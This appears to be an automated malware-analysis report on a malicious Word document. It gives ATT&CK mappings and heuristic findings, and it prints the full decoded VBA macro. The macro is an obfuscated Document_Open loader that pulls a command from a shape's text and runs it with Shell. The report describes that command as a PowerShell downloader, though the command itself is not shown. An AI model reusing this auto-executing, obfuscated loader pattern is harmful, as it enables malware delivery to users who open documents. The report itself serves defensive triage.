Risk Score: 272 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The sample contains a Document_Open VBA macro that uses the Shell() function to execute a command. This command constructs a complex string that includes multiple URLs and then uses PowerShell to download and execute a second-stage payload. The presence of cmd.exe and PowerShell invocations, along with the embedded URLs, strongly indicates downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Malware.Dkah-6765261-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dkah-6765261-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    WvnaYo = CByte(190683170)
    lGhpY = Array(uwVTH, Interaction.Shell(ijJrkuEPzd, zFAiHw), uZIpwiPOp)
    On Error Resume Next
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ffd33b332fa24b088e827112573bd89076b19b96e336fcca6da1af775cb1a592) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6127 bytes |

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely. 128 of 195 identifiers look randomly generated (e.g. 'djLvvdOHQVNFp'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "djLvvdOHQVNFp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HHzYVd = Atn(zmQqqwQO)
tqbUb = CLng(qKCpKs)
ZjkDtj = Cos(nHkbiC)
aPNYBqJd = CByte(dsnqRpWfT)
mNjFnEkDN = CByte(250988994)
zqZfP = CBool(308240298)
RICEvlHK = ptwkE
mQYqK = 171256116
Qmwrod = CByte(10533968)
On Error Resume Next
mmwFEcKSQ = Atn(aaMAVT)
QTLzM = CLng(IaAhYRdVm)
OLrMkaO = Cos(lZiVHusrd)
FJVsZr = CByte(fEvmAmwn)
wodHXqESM = CByte(256926545)
mSFpjn = CBool(118542378)
dFWlzX = VTHkm
hIvDNVoP = 33979936
fmbBM = CByte(331258523)
Set MUjKt = Shapes("OTTJIaj")
On Error Resume Next
oTlur = Atn(mqlEGOZw)
JFijhwq = CLng(kjGEDLnM)
YqjuQcb = Cos(lXhvcW)
zwizEMPFz = CByte(AOkcifws)
qiMcsdH = CByte(82012205)
ZIqHJJEFd = CBool(272259149)
SIlmM = NqsCri
BjPmW = 276171471
wATjor = CByte(297576142)
ijJrkuEPzd = MUjKt.TextFrame.ContainingRange
On Error Resume Next
mJYEvbDzO = Atn(trmZC)
fKhSYzo = CLng(kpcDbr)
JCJZOQGz = Cos(TzRbv)
TOEzmr = CByte(mXoVGT)
zAYWS = CByte(236639815)
cznEZLbz = CBool(174127811)
NVaVOzdF = rPmktKmtF
ZuILVr = 94827526
sNfqnw = CByte(60706384)
On Error Resume Next
jfZzO = Atn(ncjEu)
oYrssc = CLng(FHAzVrATN)
bGbZQim = Cos(FjQjfj)
dbluBG = CByte(jMHwjjD)
NlZwF = CByte(331838805)
oXuEcm = CBool(299026864)
VcQjsQP = MXAXORT
FMzVfKhdR = 69010352
NAwdnpjl = CByte(135448091)
On Error Resume Next
ZcjiNwq = Atn(frtYrENrP)
AjOoNabP = CLng(SShOPtFZG)
WtabAah = Cos(hXErGwQRF)
lOFCwD = CByte(iwddflf)
PspZE = CByte(91925882)
fdtrob = CBool(83421334)
zwntnsWT = XEWbETCmZ
qFbrBzYi = 186453979
GOwRP = CByte(209923872)
On Error Resume Next
AjAIu = Atn(fzZWbifR)
KjBrGVAq = CLng(hVhRJ)
SHAoHT = Cos(OEjiHdz)
CpPBp = CByte(TXUfA)
qbYzNqGEU = CByte(194937586)
JNpVwIYOX = CBool(282798583)
ffSQT = zjjJHZ
nfjVRWv = 233697862
wFoAmWP = CByte(316268513)
On Error Resume Next
UHvYDa = Atn(FmSJYGrz)
nIUsIBOVG = CLng(qIdAMn)
CjUuDi = Cos(FEhzWEfcz)
MNdhF = CByte(saRlkj)
mFVHEKc = CByte(36804658)
aVnDUPzC = CBool(259115540)
IbnwKj = OcUlwPYcv
AzaSXvbnH = 303053877
wdaPz = CByte(147508158)
On Error Resume Next
lamUmw = Atn(iMjBr)
iNOwbjK = CLng(sZOVjBAK)
qrSLNR = Cos(HKpjrG)
VTAfnQdzX = CByte(isBYzD)
IXtpJYRRv = CByte(340546942)
RtiomjsBi = CBool(147315917)
tpsTBj = QqHHvXT
AMujNs = 111783553
jdnqGRjw = CByte(133867308)
Const zFAiHw = 0
On Error Resume Next
wqUrj = Atn(UsCNrjhRQ)
nrDPmp = CLng(QNXzjA)
GPpPiznt = Cos(shzocA)
Rvrdj = CByte(jqXHX)
dIwos = CByte(124709574)
ctRjR = CBool(207874219)
YKimBpPEF = pWzzj
sbbjPJwsH = 142168580
YOzLZwp = CByte(226651696)
On Error Resume Next
rsTaH = Atn(pMUUDV)
RNoXPPq = CLng(WfCaEYi)
IbdVYc = Cos(YEQiBahDq)
PhOdj = CByte(aOZUNRAC)
LwMtaADo = CByte(141856682)
TzjoFp = CBool(180073772)
VpqQlc = DHwIiHEOu
dUKQFLtsO = 88173325
tZUimFiM = CByte(323588937)
On Error Resume Next
bsKVK = Atn(izXnVw)
LbCzFp = CLng(oCJkJADX)
WQQECGkS = Cos(rKTzYiP)
hBiKB = CByte(IPSZi)
LJLKPAW = CByte(32908082)
KFrjdNfQq = CBool(192338905)
UBTCsZUO = ojjBs
izIiYH = 66688321
WvnaYo = CByte(190683170)
lGhpY = Array(uwVTH, Interaction.Shell(ijJrkuEPzd, zFAiHw), uZIpwiPOp)
On Error Resume Next
EupYwld = Atn(zJBWkz)
fiAcQRiWr = CLng(aIkJUaPj)
ztHlEm = Cos(vKSbWZQD)
fJAfMaX = CByte(nWdtBdjmq)
zAYwvq = CByte(196444003)
TDQOArj = CBool(219856394)
RPAGZVKz = JtuhjojH
CEiNKC = 280369293
UjZVl = CByte(85003387)
On Error Resume Next
vBAhQPap = Atn(aDZjchhRB)
RdEbp = CLng(mJNNdzaA)
IbVKifJ = Cos(HJqzZm)
zifos = CByte(qZKti)
NbLdd = CByte(168787041)
UGMHX = CBool(191391185)
IzSwr = WFQzRl
RRBKR = 1811355
wsvjNXQ = CByte(119937038)
On Error Resume Next
NirhPSs = Atn(FikbzIEBs)
KrwcH = CLng(WBbjAzAY)
lJziLCwz = Cos(qsFIBUNNc)
uAdlbELNr = CByte(vIiMvN)
GSjzLuzlP = CByte(217443174)
AGSnUB = CBool(191650299)
IXWiApHl = iNtMo
HuvzjFd = 2519266
XwNltI = CByte(261301036)
On Error Resume Next
TnwCn = Atn(MvudE)
XjnjWz = CLng(GYAufvILz)
nsYAPG = Cos(nzWLuW)
zJoKQQ = CByte(aJtYf)
sQGfwO = CByte(244144586)
kfJIZ = CBool(151226417)
XclMCnzWH = uhHNifcjn
XsrPflG = 81680282
iCqtKDh = CByte(49332319)
End Sub